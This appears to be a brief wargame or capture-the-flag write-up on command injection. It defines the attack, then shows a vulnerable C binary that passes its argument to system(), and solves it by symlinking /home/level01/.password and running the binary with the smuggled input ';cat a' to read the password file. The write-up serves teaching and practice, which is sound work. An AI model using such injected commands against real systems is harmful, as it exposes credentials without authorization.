Command Injection





















Description
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.


This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.

level01@wargame:/tmp$ cat /home/level01/bin01.c
#include <stdio.h>
#include <string.h>

int main(int argc, char ** argv)
{
        char cmd[256]= "/bin/ls -la ";
        if(argc!=2)
        {
                printf("Usage : %s <nom de dossier>\n",argv[0]);
                return 1;
        }
        if(strlen(argv[1])<9)
        {
                strcat(cmd, argv[1]);
                system(cmd);
        }
        else
        {
                printf("Pour des raisons de sécurité, le dossier que vous souhaitez lister ne doit pas comporter plus de 8 caractères.\n");
        }
        return 0;

}

tmp scrivibile

cd /tmp/
ln -s /home/level01/.password a

home/level01/bin01 ';cat a'

Categories: , , , Share

Leave a Reply